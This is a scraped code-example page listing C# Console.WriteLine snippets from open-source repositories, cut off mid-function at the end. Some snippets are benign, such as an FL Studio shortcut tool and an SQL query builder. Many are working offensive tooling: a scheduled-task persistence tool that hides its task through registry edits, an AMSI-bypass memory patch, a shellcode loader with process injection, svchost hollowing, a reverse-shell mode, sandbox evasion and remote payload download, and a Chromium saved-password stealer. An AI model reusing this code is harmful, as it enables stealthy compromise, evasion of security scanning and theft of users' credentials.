System.Console.WriteLine(string)

Here are the examples of the csharp api System.Console.WriteLine(string) taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

40425 Examples 7

19 Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5

static void Main(string[] args)
        {

            Console.WriteLine("Running...");
            try
            {
                FL_RPC.Init();
            }
            catch (Exception e)
            {
                Console.WriteLine("\n \nERROR: " + e.Message);
                Console.WriteLine("INFO: Exception Name: " + e.GetType());
                Console.WriteLine("\n");
                FL_RPC.StopAndExit();
                Environment.Exit(-1);
            }
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5

static void Main(string[] args)
        {
            try
            {
                PrintIntro();
                GetInfo();
                GetFLPaths();
                bool go = Review();
                if (go)
                {
                    Execute();
                    System.Threading.Thread.Sleep(2000);
                    Environment.Exit(0);
                }
                if (!go)
                {
                    Console.WriteLine("\nOperation cancelled");
                    System.Threading.Thread.Sleep(2000);
                    Environment.Exit(-1);
                }
            }
            catch(Exception e)
            {
                Console.WriteLine(string.Format("ERR: {0}", e.Message));
               Environment.Exit(-1);
            }
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5

static void PrintIntro()
        {
            Console.WriteLine("This program will create a shortcut that will launch both FL Studio and FL-RPC for Discord");
            Console.WriteLine("Written by HugoPilot (C0der) - Licensed under GNU GPL v3");
            Console.WriteLine("Check out my other projects at https://github.com/hugopilot!");
            Console.WriteLine("------------------------------------------------------------------------------------------");
            Console.WriteLine("\n");
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5

static void GetInfo()
        {
            Console.WriteLine("Would you like to replace your current shortcuts on your desktop? (Y/N)");
            switch (Console.ReadKey().Key)
            {
                case ConsoleKey.Y:
                    ReplaceDesktop = true;
                    break;
                case ConsoleKey.N:
                    ReplaceDesktop = false;
                    break;
                default:
                    ReplaceDesktop = false;
                    break;
            }
            Console.WriteLine("\n Leave blank if you don't want to add shortcuts");
            Console.Write("\n Where would you like to write (additonal) shortcuts? Write the full path to the folder, seperate folder paths with a comma (,): ");
            string feed = Console.ReadLine();
            if (feed != null)
            {
                WriteShortcuts = feed.Split(',');
            }

            Console.Write("\n Enter the version number of FL Studio (e.g 20): ");
            VersionNumber = Console.ReadLine();
            Console.WriteLine("Thank you! \n \n");
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5

static void GetFLPaths()
        {
            string path = (string)Registry.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Image-Line\\Shared\\Paths", "FL Studio", null);
            if(path == null)
            {
                Console.WriteLine("No FL Studio path detected!\n\n");
                Console.Write("Please enter full path to the FL Studio executable: ");
                string output = Console.ReadLine();
                System.Diagnostics.FileVersionInfo FLInf = System.Diagnostics.FileVersionInfo.GetVersionInfo(output);
                if (FLInf.ProductName != "FL Studio")
                {
                    Console.WriteLine("\n   This file doesn't appear to be a FL Studio executable...try again!");
                    GetFLPaths();
                }
                FLStudioPaths = output;
            }
            else
            {
                FLStudioPaths = path;
                Console.WriteLine(string.Format("Found FL Studio at path: {0}", path));
                Console.WriteLine("Correct? (Y/N)");
                switch (Console.ReadKey().Key)
                {
                    case ConsoleKey.Y:
                        break;
                    case ConsoleKey.N:
                        Console.Write("Please enter full path to the FL Studio executable: ");
                        string output = Console.ReadLine();
                        output.Replace("\"", string.Empty);
                        System.Diagnostics.FileVersionInfo FLInf = System.Diagnostics.FileVersionInfo.GetVersionInfo(output);
                        if (FLInf.ProductName != "FL Studio")
                        {
                            Console.WriteLine("\n   This file doesn't appear to be a FL Studio executable...try again!");
                            System.Threading.Thread.Sleep(1000);
                            GetFLPaths();
                        }
                        FLStudioPaths = output;
                        break;
                }
            }
            
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5

static bool Review()
        {
            Console.WriteLine("\n Please review these settings: \n");
            Console.WriteLine("-------------------------------------------------------------------------------");
            Console.WriteLine("Shortcuts:");
            Console.WriteLine(string.Format("   Replace desktop shortcuts: {0} \n", ReplaceDesktop.ToString()));
            if (WriteShortcuts[0] == "")
            {
                Console.WriteLine(string.Format("   Don't write additional shortcuts"));
            }
            else
            {
                Console.WriteLine(string.Format("   Write additional shortcuts to: \n"));
                foreach(string p in WriteShortcuts)
                {
                    Console.WriteLine(string.Format("       {0}", p));
                }
                Console.WriteLine();
            }
            Console.WriteLine("-------------------------------------------------------------------------------");
            Console.WriteLine("FL Studio versions:\n");
            Console.WriteLine(string.Format("   Path: {0}", FLStudioPaths));
            if(VersionNumber == ""){ Console.WriteLine("    No version specified\n"); }
            else
            { Console.WriteLine(string.Format("   Version: {0}\n", VersionNumber)); }
            Console.WriteLine("-------------------------------------------------------------------------------\n");
            Console.WriteLine("Are these settings OK? (Y/N)");
            switch (Console.ReadKey().Key)
            {
                case ConsoleKey.Y:
                    return true;
                case ConsoleKey.N:
                    return false;
            }
            return false;
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0x2b00b1e5

static void Execute()
        {
            string batchpath = Path.Combine(FolderExe, "SHORTCUT.bat");
            CreateBatch(FLStudioPaths, batchpath);
            if (ReplaceDesktop)
            {
                CreateShortcut(string.Format("FL Studio {0}", VersionNumber), Environment.GetFolderPath(Environment.SpecialFolder.Desktop), batchpath, IconPath());
                CreateShortcut(string.Format("FL Studio {0}", VersionNumber), Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Programs), "Image-Line"), batchpath, IconPath());
                CreateShortcut(string.Format("FL Studio {0}", VersionNumber), Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Microsoft\\Windows\\Start Menu\\Programs\\Image-Line"), batchpath, IconPath());

            }
                if (WriteShortcuts[0] != "")
                {
                    foreach (string p in WriteShortcuts)
                    {
                        string realP = p.Replace(@"""", string.Empty);
                        CreateShortcut(string.Format("FL Studio {0}", VersionNumber), realP , batchpath, IconPath());
                    }
                }
            Console.WriteLine("\n\n Done, Thank you!");
        }

19 Source : Program.cs
with MIT License
from 0x727

static void Main(string[] args)
        {
            //if (args.Length == 1)
            //{
            //    string taskname = args[0];
            //    DeleteTask(taskname);
            //    return;
            //}

            if (args.Length != 2)
            {
                Banner();
                Console.WriteLine("\nUsage: SchTask.exe <File Path> <Minutes>");
                Console.WriteLine(@"   Eg: SchTask.exe C:\Windows\System32\cmd.exe 10");
                //Console.WriteLine("\nUsage: SchTask.exe <TaskName>");
                //Console.WriteLine("[!] Add the scheduled task first and then delete it");
            }
            else
            {
                Banner();
                string inputfile = args[0];
                string min = args[1];

                //选择主机随机进程名
                Process[] progresses = Process.GetProcesses();
                Random random = new Random();
                string randomname = (progresses[random.Next(progresses.Length)].ProcessName);
                if (File.Exists(inputfile))
                {
                    Copy(inputfile, randomname, min);
                    return;
                }
                Console.WriteLine("\n[x] Local file not found !");
            }
        }

19 Source : Program.cs
with MIT License
from 0x727

public static void Banner()
        {
            Console.WriteLine(@"  ___       _____ ____ _____");
            Console.WriteLine(@" / _ \__  _|___  |___ \___  |");
            Console.WriteLine(@"| | | \ \/ /  / /  __)|  / /");
            Console.WriteLine(@"| |_| |>  <  / /  / __/ / /     https://github.com/0x727");
            Console.WriteLine(@" \___//_/\_\/_/  |_____/_/      Author: AnonySec");
        }

19 Source : Program.cs
with MIT License
from 0x727

public static void Copy(string inputfile, string randomname, string min)
        {
            string appdataFile = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            string sourceFile = $@"{inputfile}";
            //获取拓展名
            string extension = Path.GetExtension(sourceFile);
            string destinationFile = appdataFile + $@"\Microsoft\Windows\Themes\{randomname}" + extension;
            if (File.Exists(destinationFile))
            {
                Console.WriteLine($"\n[x] File name exists: {destinationFile}");
                return;
            }
            else
            {
                File.Copy(sourceFile, destinationFile);
                //File.Move(sourceFile, destinationFile);
                Console.WriteLine($"\n[*] Copy File location: \n{destinationFile}");
                CreateTask(randomname, destinationFile, min);
            }
        }

19 Source : Program.cs
with MIT License
from 0x727

public static void HidXml(string taskpath)
        {
            string xml = $@"C:\Windows\System32\Tasks" + taskpath;
            FileInfo info = new FileInfo(xml);
            if (info.Exists)
            {
                info.Attributes = FileAttributes.Hidden;
                Console.WriteLine($"[*] Hidden task xml file: \n{xml}");
            }
        }

19 Source : Program.cs
with MIT License
from 0x1000000

private static void Print(IReadOnlyList<NodeModel> buffer)
        {
            foreach (var nodeModel in buffer)
            {
                Console.WriteLine(nodeModel.TypeName);
                foreach (var sn in nodeModel.SubNodes)
                {
                    Console.WriteLine($"  - {sn.PropertyName}: {sn.PropertyType}{(sn.IsList ? "[]" : "")}");
                }

                foreach (var sn in nodeModel.Properties)
                {
                    Console.WriteLine($"  * {sn.PropertyName}: {sn.PropertyType}");
                }
            }
        }

19 Source : Program.cs
with MIT License
from 0x1000000

private static async Task Step12Merge(ISqDatabase database, bool output)
        {
            var data = new[]
            {
                new { FirstName = "Francois", LastName = "Sturman2" },
                new { FirstName = "Allina", LastName = "Freeborne2" },
                new { FirstName = "Maye", LastName = "Malloy" },
            };

            var action = CustomColumnFactory.String("Actions");
            var inserted = CustomColumnFactory.NullableInt32("Inserted");
            var deleted = CustomColumnFactory.NullableInt32("Deleted");

            var tableUser = new TableUser();
            if (output)
            {
                await MergeDataInto(tableUser, data)
                    .MapDataKeys(s => s
                        .Set(s.Target.FirstName, s.Source.FirstName))
                    .MapData(s => s
                        .Set(s.Target.LastName, s.Source.LastName))
                    .WhenMatchedThenUpdate()
                    .AlsoSet(s => s
                        .Set(s.Target.Version, s.Target.Version + 1)
                        .Set(s.Target.ModifiedAt, GetUtcDate()))
                    .WhenNotMatchedByTargetThenInsert()
                    .AlsoInsert(s => s
                        .Set(s.Target.Version, 1)
                        .Set(s.Target.ModifiedAt, GetUtcDate()))
                    .Output((t, s, m) => m.Inserted(t.UserId.As(inserted)).Deleted(t.UserId.As(deleted)).Action(action))
                    .Done()
                    .Query(database,
                        r => Console.WriteLine(
                            $"UserId Inserted: {inserted.Read(r)},UserId Deleted: {deleted.Read(r)} , Action: {action.Read(r)}"));
            }
            else
            {
                //PG and My SQL do not support MERGE natively
                await MergeDataInto(tableUser, data)
                    .MapDataKeys(s => s
                        .Set(s.Target.FirstName, s.Source.FirstName))
                    .MapData(s => s
                        .Set(s.Target.LastName, s.Source.LastName))
                    .WhenMatchedThenUpdate()
                    .AlsoSet(s => s
                        .Set(s.Target.Version, s.Target.Version + 1)
                        .Set(s.Target.ModifiedAt, GetUtcDate()))
                    .WhenNotMatchedByTargetThenInsert()
                    .AlsoInsert(s => s
                        .Set(s.Target.Version, 1)
                        .Set(s.Target.ModifiedAt, GetUtcDate()))
                    .Done()
                    .Exec(database);
            }
        }

19 Source : Program.cs
with MIT License
from 0x1000000

private static async Task Step18ExportToJson(ISqDatabase database)
        {
            var tableUser = new TableUser(Alias.Empty);

            var selectExpr = Select(tableUser.FirstName, tableUser.LastName)
                .From(tableUser)
                .Where(tableUser.LastName == "Sturman")
                .Done();

            //Exporting
            var memoryStream = new MemoryStream();
            var jsonWriter = new Utf8JsonWriter(memoryStream);
            selectExpr.SyntaxTree().ExportToJson(jsonWriter);

            string json = Encoding.UTF8.GetString(memoryStream.ToArray());

            Console.WriteLine(json);

            //Importing
            var restored = (ExprQuerySpecification)ExprDeserializer
                .DeserializeFormJson(JsonDoreplacedent.Parse(json).RootElement);

            var result = await restored
                .QueryList(database, r => (tableUser.FirstName.Read(r), tableUser.LastName.Read(r)));

            foreach (var name in result)
            {
                Console.WriteLine(name);
            }
        }

19 Source : ModelClassGeneratorTest.cs
with MIT License
from 0x1000000

[Test]
        public void BasicTest()
        {
            TestFileSystem fileSystem = new TestFileSystem();

            fileSystem.AddFile("A\\table1.cs", TestTable1Text);

            var generated = ExistingCodeExplorer
                .EnumerateTableDescriptorsModelAttributes("A", fileSystem)
                .ParseAttribute(true)
                .Createreplacedysis()
                .Select(meta=> ModelClreplacedGenerator.Generate(meta, "Org", "", true, fileSystem, out _).SyntaxTree)
                .ToList();

            var trees = new List<SyntaxTree>();

            foreach (var syntaxTree in generated)
            {
                trees.Add(CSharpSyntaxTree.ParseText(syntaxTree.ToString()));
            }

            trees.Add(CSharpSyntaxTree.ParseText(TestTable1Text));

            var compilation = CSharpCompilation.Create("SqModels",
                trees,
                options: new CSharpCompilationOptions(OutputKind.DynamicallyLinkedLibrary, nullableContextOptions: NullableContextOptions.Enable)); 

            compilation = compilation.AddReferences(
                MetadataReference.CreateFromFile(replacedembly.Load("netstandard, Version=2.0.0.0").Location),
                MetadataReference.CreateFromFile(typeof(object).replacedembly.GetreplacedemblyLocation()),
                MetadataReference.CreateFromFile(replacedembly
                    .Load("System.Runtime, Version=4.2.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a")
                    .Location),
                MetadataReference.CreateFromFile(typeof(SqQueryBuilder).replacedembly.GetreplacedemblyLocation()));

            MemoryStream ms = new MemoryStream();

            var emitResult = compilation.Emit(ms);
            if (!emitResult.Success)
            {
                Diagnostic first = emitResult.Diagnostics.First();

                var sourceCode = first.Location.SourceTree?.ToString();
                var s = sourceCode?.Substring(first.Location.SourceSpan.Start, first.Location.SourceSpan.Length);
                Console.WriteLine(sourceCode);
                replacedert.Fail(first.GetMessage()+ (string.IsNullOrEmpty(s)?null:$" \"{s}\""));
            }

            var replacedembly = replacedembly.Load(ms.ToArray());

            var allTypes = replacedembly.GetTypes();

            replacedert.AreEqual(21, allTypes.Length);
        }

19 Source : FLRPC.cs
with GNU General Public License v3.0
from 0x2b00b1e5

private static void OnPresenceUpdate(object sender, PresenceMessage args)
        {
            //This is called when the Rich Presence has been updated in the discord client.
            // Use this to keep track of the rich presence and validate that it has been sent correctly.
            Console.WriteLine("Changes detected, Presence updated");
        }

19 Source : Program.cs
with MIT License
from 0x727

public static void RegistryKeyRule(string randomname)
        {
            string regpath = @"Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UPnP\" + randomname;
            try
            {
                //授予Restore、Backup、TakeOwnership特权
                TokenManipulator.AddPrivilege("SeRestorePrivilege");
                TokenManipulator.AddPrivilege("SeBackupPrivilege");
                TokenManipulator.AddPrivilege("SeTakeOwnershipPrivilege");

                //更改注册表项值的所有者
                RegistryKey subKey = Registry.LocalMachine.OpenSubKey(regpath, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.TakeOwnership);
                RegistrySecurity rs = new RegistrySecurity();
                //设置安全性的所有者为Administrators
                rs.SetOwner(new NTAccount("Administrators"));
                //为注册表项设置权限
                subKey.SetAccessControl(rs);

                //更改注册表项值的权限
                RegistryAccessRule rar = new RegistryAccessRule("Administrators", RegistryRights.FullControl, AccessControlType.Allow);
                rs.AddAccessRule(rar);
                subKey.SetAccessControl(rs);
                subKey.Close();

                RegistryKey rk = Registry.LocalMachine.OpenSubKey(regpath, true);
                //设置Index值为0,隐藏计划任务,默认值为1
                rk.SetValue("Index", 0, RegistryValueKind.DWord);
                rk.Close();

                RegeditKeyExist(regpath);

                string rkl = Registry.LocalMachine + "\\" + regpath;
                Console.WriteLine($"[*] RegistryKey location: \n{rkl}");
            }
            finally
            {
                //删除Restore、Backup、TakeOwnership特权
                TokenManipulator.RemovePrivilege("SeRestorePrivilege");
                TokenManipulator.RemovePrivilege("SeBackupPrivilege");
                TokenManipulator.RemovePrivilege("SeTakeOwnershipPrivilege");

                Console.WriteLine("\n[+] Successfully add scheduled task !");
            }
        }

19 Source : Program.cs
with MIT License
from 0x727

public static void DeleteTask(string taskname)
        {
            //不要写成 "\Microsoft\Windows\UPnP\" — 报错 — 找不到
            string taskpath = @"\Microsoft\Windows\UPnP";
            //获得计划任务
            TaskService ts = new TaskService();
            TaskCollection tc = ts.GetFolder(taskpath).GetTasks();
            //Console.WriteLine($"{tc}");
            if (tc.Exists(taskname))
            {
                string dtask = taskpath + "\\" + taskname;
                ts.RootFolder.DeleteTask(dtask);
                Console.WriteLine("\n[+] Successfully delete scheduled task !");
            }
            else
            {
                Console.WriteLine("\n[!] Please add scheduled task !");
            }
        }

19 Source : Class1.cs
with GNU General Public License v3.0
from 0xB455

public static int Patch()
        {
            //Get pointer for the amsi.dll        
            IntPtr TargetDLL = LoadLibrary("amsi.dll");
            if (TargetDLL == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve amsi.dll pointer!");
                return 1;
            }

            //Get pointer for the AmsiScanBuffer function
            IntPtr AmsiScanBufrPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer");
            if (AmsiScanBufrPtr == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve AmsiScanBuffer function pointer!");
                return 1;
            }

            /*
             *  Apply memory patching as described by Cyberark here:          
             *  https://www.cyberark.com/threat-research-blog/amsi-bypreplaced-redux/
             */
            UIntPtr dwSize = (UIntPtr)4;
            uint Zero = 0;

            //Pointer changing the AmsiScanBuffer memory protection from readable only to writeable (0x40)
            if (!VirtualProtect(AmsiScanBufPtr, dwSize, 0x40, out Zero))
            {
                Console.WriteLine("ERROR: Could not modify AmsiScanBuffer memory permissions!");
                return 1;
            }

            Byte[] Patch = { 0x31, 0xff, 0x90 }; //The new patch opcode

            //Setting a pointer to the patch opcode array (unmanagedPointer)
            IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
            Marshal.Copy(Patch, 0, unmanagedPointer, 3);

            //Patching the relevant line (the line which submits the rd8 to the edi register) with the xor edi,edi opcode
            MoveMemory(AmsiScanBufrPtr + 0x001b, unmanagedPointer, 3); 

            Console.WriteLine("Great success. AmsiScanBuffer patched! :)");
            return 0;
        }

19 Source : Program.cs
with MIT License
from 0xDivyanshu

static int process_injection(string location, int button, int encryption, string preplacedword)
        {
            Process[] remote_p = Process.GetProcessesByName("notepad");
            Process current_p = Process.GetCurrentProcess();
            int pid = 0;

            if (remote_p.Length == 0)
            {
                //Create Process
                Process p = new Process();
                p.StartInfo.FileName = "C:\\Windows\\System32\\notepad.exe";
                p.StartInfo.WindowStyle = ProcessWindowStyle.Maximized;
                p.Start();
                pid = p.Id;
            }
            else
            {
                pid = remote_p[0].Id;
            }

            byte[] shellcode = downloaded_data(location, encryption, preplacedword);
            //Initializations
            bool res = false;
            IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
            IntPtr address = IntPtr.Zero;
            if (Flags.advanced_bypreplaced == 0)
            {
                address = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
                IntPtr bytes = IntPtr.Zero;
                res = WriteProcessMemory(hProcess, address, shellcode, shellcode.Length, out bytes);
                if (res == false)
                {
                    Console.WriteLine("Cannot copy into process");
                    return -1;
                }
                IntPtr thread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, address, IntPtr.Zero, 0, IntPtr.Zero);
                return 0;
            }
            else
            {
                IntPtr Section_handle = IntPtr.Zero;
                uint size = (uint)shellcode.Length;
                if (NtCreateSection(ref Section_handle, SECTION_ALL_ACCESS, IntPtr.Zero, ref size, 0x40, SEC_COMMIT, IntPtr.Zero) != 0)
                {
                    Console.WriteLine("[!] Cannot create section");
                    return -1;
                }
                IntPtr local_addr = IntPtr.Zero;
                IntPtr remote_addr = IntPtr.Zero;
                ulong offsec = 0;

                if (NtMapViewOfSection(Section_handle, current_p.Handle, ref local_addr, UIntPtr.Zero, UIntPtr.Zero, out offsec, out size, 2, 0, EXECUTE_READ_WRITE) != 0)
                {
                    Console.WriteLine("[!] Cannot map the section into remote process");
                    return -1;
                }

                if (NtMapViewOfSection(Section_handle, hProcess, ref remote_addr, UIntPtr.Zero, UIntPtr.Zero, out offsec, out size, 2, 0, EXECUTE_READ_WRITE) != 0)
                {
                    Console.WriteLine("Cannot map the section into local process");
                    return -1;
                }

                Marshal.Copy(shellcode, 0, local_addr, shellcode.Length);
                CreateRemoteThread(hProcess, IntPtr.Zero, 0, remote_addr, IntPtr.Zero, 0, IntPtr.Zero);
                NtUnmapViewOfSection(current_p.Handle, local_addr);
                return 0;
            }
        }

19 Source : Program.cs
with MIT License
from 0xDivyanshu

static void help_xenon()
        {
            Console.WriteLine("Help Options for Xenon:");
            Console.WriteLine("-m \t Mode of operation");
            Console.WriteLine("\t-m 1 \t Specifies the mode as Process injection");
            Console.WriteLine("\t-m 2 \t Specifies the mode as DLL Injection");
            Console.WriteLine("\t-m 3 \t Specifies the mode as Process Hollowing");
            Console.WriteLine("\t-m 4 \t No injection! Give me my damn shell\n");
            Console.WriteLine("\t-m 5 \t Powershell session via CLM bypreplaced\n");
            Console.WriteLine("\t-m 6 \t DLL hollowing ");
            Console.WriteLine("-TempFile \t File location that your current user can read");
            Console.WriteLine("-shellcode \t Use shellcode");
            Console.WriteLine("-dll \t Use dll");
            Console.WriteLine("-decrypt-xor \t Specify Xor decryption for shellcode");
            Console.WriteLine("\t -preplaced \t Specifty the preplacedword for Xor decryption");
            Console.WriteLine("-decrypt-aes \t Specify aes decryption for shellcode");
            Console.WriteLine("\t -preplaced \t Specifty the preplacedword for aes decryption");
            Console.WriteLine("-location \t Specify the location i.e either server or local");
            Console.WriteLine("-bypreplaced \tUses enhance attempts to bypreplaced AV");
            return;
        }

19 Source : Program.cs
with MIT License
from 0xDivyanshu

static int Main(string[] args)
        {
            //xenon.exe -m <1,2,3> --<shellcode/dll> --location <http://1.1.1.1/name, C:\\A\\B\\name> --<enc> --key <preplacedword>
            //IEnumerable<string> arg = Arguments.SplitCommandLine(string.Join(" ", args));
            IEnumerable<string> arg = args;
            var arguments = new Arguments(arg);

            if (arguments.Exists("m"))
            {
                int m = int.Parse(arguments.Single("m"));
                if (m == 5)
                {
                    if (arguments.Exists("TempFile"))
                    {
                        string name = arguments.Single("TempFile");
                        powershell_clm(name);
                        Console.WriteLine("Powershell session exit!");
                        return 0;
                    }
                    else
                    {
                        help_xenon();
                        return -1;
                    }
                }
            }

            if ((arguments.Exists("m") && arguments.Exists("location") && (arguments.Exists("shellcode") || arguments.Exists("dll"))) == false || arguments.Count < 3)
            {
                help_xenon();
                return -1;
            }

            // Sleep AV detection

            DateTime t1 = DateTime.Now;
            Sleep(2000);
            if (DateTime.Now.Subtract(t1).TotalSeconds < 2)
            {
                Console.WriteLine("[!] AV Emulator detected! Behaving like a good boy :)");
                return 0;
            }

            //Options to transfer shellcode/DLL - Via SMB share and local disk (.dll for dll and .txt for shellcode)

            //1. Process injection via shellcode
            //2. Reflective Process injection via DLL (in memory)
            //3. Process Hollowing (shellcode)


            Console.WriteLine("[+] Parsing command line arguments");

            //Parsing Command line arguments
            int mode = int.Parse(arguments.Single("m"));
            string location = arguments.Single("location");
            int button = 0;

            if (arguments.Exists("shellcode"))
            {
                button = 1;
            }
            else
                button = 2;

            int decryption = 0;
            string preplaced = "";

            if (arguments.Exists("decrypt-xor"))
            {
                decryption = 1;
                preplaced = arguments.Single("preplaced");
                preplaced = CreateMD5(preplaced);
            }
            else if (arguments.Exists("decrypt-aes"))
            {
                decryption = 2;
                preplaced = arguments.Single("preplaced");
                preplaced = CreateMD5(preplaced);
            }

            if (arguments.Exists("bypreplaced"))
            {
                Flags.advanced_bypreplaced = 1;
            }

            // Dealing with command line arguments for main logic
            int response = 0;

            switch (mode)
            {
                case 1:
                    if (button == 1)
                        Console.WriteLine("Injecting into process via shellcode at " + location);
                    else
                        Console.WriteLine("Injecting into process via DLL at " + location);
                    response = process_injection(location, button, decryption, preplaced);

                    if (response == 0)
                        Console.WriteLine("[+] Process Injection done :)");
                    else
                        Console.WriteLine("[!] Error running the process injection module");
                    break;

                case 2:
                    Console.WriteLine("DLL Injection into process using DLL at " + location);
                    response = reflective_dll_injection(location);

                    if (response == 0)
                        Console.WriteLine("[+] DLL Injection done :)");
                    else
                        Console.WriteLine("[!] Error running the DLL injection module");
                    break;

                case 3:
                    Console.WriteLine("Using Process hollowing into process using DLL at " + location);
                    response = process_hollowing(location, decryption, preplaced);

                    if (response == 0)
                        Console.WriteLine("[+] Process hollowing done :)");
                    else
                        Console.WriteLine("[!] Error running the process hollowing module");
                    break;

                case 4:
                    Console.WriteLine("Getting a basic reverse shell for you using shellcode at " + location);
                    basic_rev(location, decryption, preplaced);
                    Console.WriteLine("Reverse Shell done :)");
                    break;

                case 6:
                    Console.WriteLine("DLL Hollowing in process! Using shellcode at " + location);
                    int res = dll_hollowing(location, decryption, preplaced);
                    if (res == 0)
                        Console.WriteLine("[+] DLL Hollowing done :)");
                    else
                        Console.WriteLine("[!] Error running the DLL hollowing module");
                    break;

                default:
                    Console.WriteLine("Mode not found");
                    break;
            }

            return 0;
        }

19 Source : Helper.cs
with MIT License
from 0xDivyanshu

static void Main(string[] args)
        {
            if (args[0].StartsWith("-location") && args[1].StartsWith("-encrypt") && args[2].StartsWith("-preplacedword") && args[3].StartsWith("-saveTo"))
            {
                string location = args[0].Split('=')[1];
                string algo = args[1].Split('=')[1];
                string preplaced = args[2].Split('=')[1];
                string writeTo = args[3].Split('=')[1];
                preplaced = CreateMD5(preplaced);
                byte[] shellcode;
                if (location.StartsWith("http") || location.StartsWith("\\"))
                {
                    WebClient wc = new WebClient();
                    string url = location;
                    shellcode = wc.DownloadData(url);
                }
                else
                {
                    shellcode = File.ReadAllBytes(location);
                }
                
                if (algo == "aes")
                {
                    byte[] encoded_shellcode = Encrypt(shellcode, preplaced,"1234567891234567");
                    File.WriteAllBytes(writeTo, encoded_shellcode);
                    Console.WriteLine("[+] Encrypted aes shellcode written to disk");
                    return;
                }
                else if (algo == "xor")
                {
                    byte[] encoded_shellcode = xor_enc(shellcode, preplaced);
                    File.WriteAllBytes(writeTo, encoded_shellcode);
                    Console.WriteLine("[+] Encrypted xor shellcode written to disk");
                    return;
                }
            }
            else
            {
                help_me();
                return;
            }
        }

19 Source : Chromium.cs
with GNU General Public License v3.0
from 0xfd3

public static string Decrypt(string encryptedData)
        {
            if (encryptedData == null || encryptedData.Length == 0)
                return null;
            try
            {
                return Encoding.UTF8.GetString(ProtectedData.Unprotect(Encoding.Default.GetBytes(encryptedData), null, DataProtectionScope.CurrentUser));
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.ToString());
                return null;
            }
        }

19 Source : Program.cs
with GNU General Public License v3.0
from 0xfd3

static void Main(string[] args)
        {
            var a = Chromium.Grab();

            foreach (var b in a)
            {
                Console.WriteLine("Url: " + b.URL);
                Console.WriteLine("Username: " + b.UserName);
                Console.WriteLine("Preplacedword: " + b.Preplacedword);
                Console.WriteLine("Application: " + b.Application);
                Console.WriteLine("=============================");
            }

            Console.ReadKey();

        }

19 Source : Program.cs
with MIT License
from 0xDivyanshu

static int process_hollowing(string location, int encryption, string preplacedword)
        {
            STARTUPINFO si = new STARTUPINFO();
            PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
            bool res = CreateProcess(null, "C:\\Windows\\System32\\svchost.exe", IntPtr.Zero, IntPtr.Zero, false, 0x4, IntPtr.Zero, null, ref si, out pi);
            if (res == false)
            {
                Console.WriteLine("[!] Error creating svchosts.exe");
                return -1;
            }
            PROCESS_BASIC_INFORMATION pib = new PROCESS_BASIC_INFORMATION();
            uint tmp = 0;

            IntPtr hProcess = pi.hProcess;
            ZwQueryInformationProcess(hProcess, 0, ref pib, (uint)(UIntPtr.Size * 6), ref tmp);

            IntPtr PointerToPE = (IntPtr)((Int64)pib.PebBaseAddress + 0x10);
            byte[] addrBuf = new byte[IntPtr.Size];

            IntPtr nRead = IntPtr.Zero;
            ReadProcessMemory(hProcess, PointerToPE, addrBuf, addrBuf.Length, out nRead);
            IntPtr SvcHostBase = (IntPtr)(BitConverter.ToInt64(addrBuf, 0));

            byte[] data = new byte[0x200];
            ReadProcessMemory(hProcess, SvcHostBase, data, data.Length, out nRead);

            uint e_lfanew_offset = BitConverter.ToUInt32(data, 0x3C);
            uint opthdr = e_lfanew_offset + 0x28;
            uint entrypoint_rva = BitConverter.ToUInt32(data, (int)opthdr);
            IntPtr addressOfEntryPoint = (IntPtr)(entrypoint_rva + (UInt64)SvcHostBase);

            // Get shellcode bytes from localtion
            byte[] shellcode = downloaded_data(location, encryption, preplacedword);
            WriteProcessMemory(hProcess, addressOfEntryPoint, shellcode, shellcode.Length, out nRead);
            ResumeThread(pi.hThread);
            return 0;
        }

19 Source : Helper.cs
with MIT License
from 0xDivyanshu

static void help_me()
        {
            Console.WriteLine("Helper.exe \n-location=<local_storage_of_raw_shellcode> \n-encrypt=<aes/xor> \n-preplacedword=<preplaced> \n-saveTo=<writeToFile>");
            return;
        }

19 Source : Chromium.cs
with GNU General Public License v3.0
from 0xfd3

private static List<Account> Accounts(string path, string browser, string table = "logins")
        {

            //Get all created profiles from browser path
            List<string> loginDataFiles = GetAllProfiles(path); 

            List<Account> data = new List<Account>();

            foreach (string loginFile in loginDataFiles.ToArray())
            {
                if (!File.Exists(loginFile))
                    continue;

                SQLiteHandler SQLDatabase;

                try
                {
                    SQLDatabase = new SQLiteHandler(loginFile); //Open database with Sqlite
                }
                catch (System.Exception ex)
                {
                    Console.WriteLine(ex.ToString());
                    continue;
                }

                if (!SQLDatabase.ReadTable(table)) 
                    continue;

                for (int I = 0; I <= SQLDatabase.GetRowCount() - 1; I++)
                {
                    try
                    {
                        //Get values with row number and column name
                        string host = SQLDatabase.GetValue(I, "origin_url");
                        string username = SQLDatabase.GetValue(I, "username_value");
                        string preplacedword = SQLDatabase.GetValue(I, "preplacedword_value");

                        if (preplacedword != null)
                        {
                            //check v80 preplacedword signature. its starting with v10 or v11
                            if (preplacedword.StartsWith("v10") || preplacedword.StartsWith("v11"))
                            {
                                //Local State file located in the parent folder of profile folder.
                                byte[] masterKey = GetMasterKey(Directory.GetParent(loginFile).Parent.FullName); 

                                if (masterKey == null)
                                    continue;

